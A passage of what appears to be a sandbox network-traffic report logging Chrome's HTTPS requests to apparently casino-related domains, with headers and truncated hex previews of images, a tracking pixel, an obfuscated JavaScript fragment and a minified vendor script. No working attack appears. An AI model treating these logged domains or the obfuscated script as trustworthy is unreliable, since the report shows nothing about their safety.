                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:01 UTC613INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:01 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 7436
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 09:02:20 GMT
                                                                                                                                                          ETag: "6645cb9c-1d0c"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE4[25],EU-GER-frankfurt-EDGE5-CACHE6[23,TCP_MISS,24],EU-FRA-paris-GLOBAL1-CACHE17[12],EU-FRA-paris-GLOBAL1-CACHE6[0,TCP_HIT,8],1.1 google
                                                                                                                                                          X-CCDN-Expires: 790132
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: b18b9b7a7f239bec59344c70db75ee3f
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          Age: 1
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:01 UTC7436INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 4c 41 4e 67 46 30 41 61 41 62 77 43 55 41 76 41 43 51 43 63 41 75 41 4d 77 46 63 30 59 41 58 41 53 33 55 78 47 4d 2b 4a 51 41 6c 4b 51 42 45 7a 4a 43 41 41 45 53 64 72 55 34 64 52 41 62 67 44 79 59 41 46 59 67 4f 41 4f 67 41 6d 49 52 70 7a 51 67 41 43 72 52 51 51 51 74 64 67 45 39 4d 41 30 51 48 31 48 49 4a 41 46 6b 55 75 35 67 42 73 51 6f 73 67 42 75 55 4e 37 4d 49 50 51 41 68 41 41 4d 41 4c 35 43 67 6e 72 32 78 4b 4b 4d 4b 43 6a 73 56 6f 37 65 6e 4c 4c 2b 4c 47 78 63 50 43 4b 30 49 4f 7a 4d 74 47 68 53 74 4c 48 78 75 6f 6d 69 41 42 59 67 55 50 71 30 75 61 77 63 33 47 69 59 52 53 56 6c 46 51 43 32 31 56 41 4a 44 76 30 67 61 4d 78 74 2b 5a 33
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtALANgF0AaAbwCUAvACQCcAuAMwFc0YAXAS3UxGM+JQAlKQBEzJCAAESdrU4dRAbgDyYAFYgOAOgAmIRpzQgACrRQQQtdgE9MA0QH1HIJAFkUu5gBsQosgBuUN7MIPQAhAAMAL5Cgnr2xKKMKCjsVo7enLL+LGxcPCK0IOzMtGhStLHxuomiABYgUPq0uawc3GiYRSVlFQC21VAJDv0gaMxt+Z3


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          233192.168.2.54998623.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:01 UTC637OUTGET /pc/image-pc/video/bbin_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4044.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:01 UTC616INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:01 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 13380
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-3444"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE2[6],EU-GER-frankfurt-EDGE4-CACHE1[0,TCP_HIT,4],EU-FRA-paris-GLOBAL1-CACHE5[4],EU-FRA-paris-GLOBAL1-CACHE6[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2489243
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 769167c8094b3fa584a35aacb7ba389a
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 102757
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:01 UTC13380INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          234192.168.2.54998423.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:01 UTC635OUTGET /pc/image-pc/video/pt_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4044.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:01 UTC617INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:01 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 13569
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-3501"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE1[6],EU-GER-frankfurt-EDGE4-CACHE2[0,TCP_HIT,5],EU-FRA-paris-GLOBAL1-CACHE21[4],EU-FRA-paris-GLOBAL1-CACHE26[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2524003
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 674653056def7a2c84561cd4fec95587
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 67997
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:01 UTC13569INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          235192.168.2.54998323.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:01 UTC635OUTGET /pc/image-pc/video/dg_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4044.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:01 UTC620INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:01 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 19634
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-4cb2"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE1[16],EU-GER-frankfurt-EDGE4-CACHE1[0,TCP_HIT,11],EU-FRA-paris-GLOBAL1-CACHE23[4],EU-FRA-paris-GLOBAL1-CACHE16[0,TCP_HIT,1],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2489243
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 3cb68ed5b861d93213fa2f7dd20f9af6
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 102757
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:01 UTC15764INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                                          2024-06-09 22:41:01 UTC3870INData Raw: 22 47 6c a2 97 23 93 c9 e4 b2 33 e4 b2 f7 d7 39 4c 8d c3 ef b9 bd bc 99 e7 9a 43 e6 f2 39 66 63 4f 33 a2 a1 42 9d b0 09 4d 42 a8 c8 00 00 ec 11 95 6a bd 72 59 d8 92 78 93 33 ef 88 cc e2 e2 44 0c 04 43 b1 23 ae 9e 4e a3 ca 14 06 81 ce 11 2c 7e d3 8a 12 47 70 69 4d 43 0d 26 25 4e a1 17 38 e5 12 c7 2c a4 51 8b 05 a7 85 00 d5 aa 38 89 c5 3b 83 22 04 3b 12 3c d7 17 11 46 ca 36 9d d4 63 40 48 14 fd da 16 38 98 35 59 a8 88 a4 9d c3 bf 7f a6 a2 26 08 c0 3e 5a 64 e3 5b 1d a1 a5 40 e9 a9 9c 64 29 59 94 ab 0a 86 53 50 7e a3 ae a2 71 99 44 9c ba 64 dd e5 c8 5c 3f dd da 64 a4 f7 4d db d3 dc f7 07 42 19 54 fa 7f 66 96 a4 0e ef 28 bc f8 ae a3 c6 06 26 68 bf 43 95 0c 47 4a 8e bd 7c b5 26 21 01 cc 45 97 1f 82 46 b9 c8 b1 9c 44 2d 6c a4 95 1a 45 de 1c 86 45 da 01 f3 dd 5e
                                                                                                                                                          Data Ascii: "Gl#39LC9fcO3BMBjrYx3DC#N,~GpiMC&%N8,Q8;";<F6c@H85Y&>Zd[@d)YSP~qDd\?dMBTf(&hCGJ|&!EFD-lEE^


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          236192.168.2.54998523.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:01 UTC639OUTGET /pc/image-pc/video/allbet_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4044.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:01 UTC616INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:01 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 17878
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-45d6"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE2[9],EU-GER-frankfurt-EDGE4-CACHE1[0,TCP_HIT,5],EU-FRA-paris-GLOBAL1-CACHE2[3],EU-FRA-paris-GLOBAL1-CACHE8[0,TCP_HIT,1],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2489243
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 0b9d8d59bdfe7c60f4fc1a086c5a7038
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 102757
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:01 UTC15768INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                                          2024-06-09 22:41:01 UTC2110INData Raw: 8b cb 07 90 89 8c 89 3a 4b 33 3e 0e 47 2c 75 00 ca 3a 3b d4 8c e3 10 1e 2d 0f 96 24 c6 51 00 6a 0e f9 62 c0 91 9e 06 24 ba b0 72 1c e3 89 7c 8a 78 e3 f1 7b 1c 6f e8 3c 6e 3a e4 70 17 b8 1b 2b 7b 89 26 98 31 b9 9c 41 65 71 6c c9 ee 39 dd b5 2e 82 33 00 49 06 a3 56 ac ec 7c b8 4c 9f 1c bf 51 2c 38 07 90 97 bf 43 ab b5 ae e8 d6 94 06 91 a2 3f a0 0c 78 96 89 19 f2 d4 ca 5d 90 ff 00 90 70 4d 98 92 fa d3 07 9a 9b 1b 6e 0f ea 38 e6 ce e5 f1 b7 5f 77 5a 97 31 c1 7d 24 36 d1 54 90 21 09 22 8d bb 44 8d 5f 44 70 f4 f1 8d 3d 26 51 7e 07 44 24 1b db 10 64 7f 53 c4 f4 e7 a1 2d ee 3e 63 88 c9 bf aa 71 2f ec 91 11 1f a5 8f 6f 2a bb 39 c9 78 5e 5b 99 e5 79 5d d5 9e 43 23 8f 94 b5 ed 96 0d 44 f6 b0 dd e4 24 99 a5 73 78 25 c8 de 98 d3 d5 ea 11 1a 30 1b 55 22 ae ed 5e a5 6b
                                                                                                                                                          Data Ascii: :K3>G,u:;-$Qjb$r|x{o<n:p+{&1Aeql9.3IV|LQ,8C?x]pMn8_wZ1}$6T!"D_Dp=&Q~D$dS->cq/o*9x^[y]C#D$sx%0U"^k


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          237192.168.2.54997943.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:01 UTC361OUTGET /cc.png?r=7992680070 HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:02 UTC341INHTTP/1.1 200 OK
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:01 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          ETag: "5e15c8c5-62"
                                                                                                                                                          Via: 1.1 google
                                                                                                                                                          Last-Modified: Wed, 08 Jan 2020 12:19:17 GMT
                                                                                                                                                          Content-Length: 98
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          X-NWS-LOG-UUID: 14899201659368610745
                                                                                                                                                          Connection: close
                                                                                                                                                          X-Cache-Lookup: Cache Miss
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:02 UTC98INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 03 50 4c 54 45 ff ff ff a7 c4 1b c8 00 00 00 0a 49 44 41 54 08 d7 63 60 00 00 00 02 00 01 e2 21 bc 33 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                          Data Ascii: PNGIHDR%VgAMAaPLTEIDATc`!3IENDB`


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          238192.168.2.54999090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:01 UTC535OUTGET /pc/public/vendor.dll.js HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://wns732.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:01 UTC640INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:01 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 316994
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 31 Oct 2018 06:58:57 GMT
                                                                                                                                                          ETag: "5bd952b1-4d642"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE4[4],EU-GER-frankfurt-EDGE5-CACHE4[0,TCP_HIT,4],EU-GER-frankfurt-GLOBAL1-CACHE2[21],EU-GER-frankfurt-GLOBAL1-CACHE4[0,TCP_HIT,20],1.1 google
                                                                                                                                                          X-CCDN-Expires: 826107
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 5997a3cd8f9a7990e5e7c8fc4b1cb07e
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1765893
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:01 UTC15744INData Raw: 76 61 72 20 76 65 6e 64 6f 72 5f 6c 69 62 72 61 72 79 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 72 29 7b 69 66 28 6e 5b 72 5d 29 72 65 74 75 72 6e 20 6e 5b 72 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 69 3d 6e 5b 72 5d 3d 7b 69 3a 72 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 74 5b 72 5d 2e 63 61 6c 6c 28 69 2e 65 78 70 6f 72 74 73 2c 69 2c 69 2e 65 78 70 6f 72 74 73 2c 65 29 2c 69 2e 6c 3d 21 30 2c 69 2e 65 78 70 6f 72 74 73 7d 76 61 72 20 6e 3d 7b 7d 3b 72 65 74 75 72 6e 20 65 2e 6d 3d 74 2c 65 2e 63 3d 6e 2c 65 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 72 29 7b 65 2e 6f 28 74 2c 6e 29 7c 7c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 6e 2c 7b 63 6f 6e 66 69
                                                                                                                                                          Data Ascii: var vendor_library=function(t){function e(r){if(n[r])return n[r].exports;var i=n[r]={i:r,l:!1,exports:{}};return t[r].call(i.exports,i,i.exports,e),i.l=!0,i.exports}var n={};return e.m=t,e.c=n,e.d=function(t,n,r){e.o(t,n)||Object.defineProperty(t,n,{confi
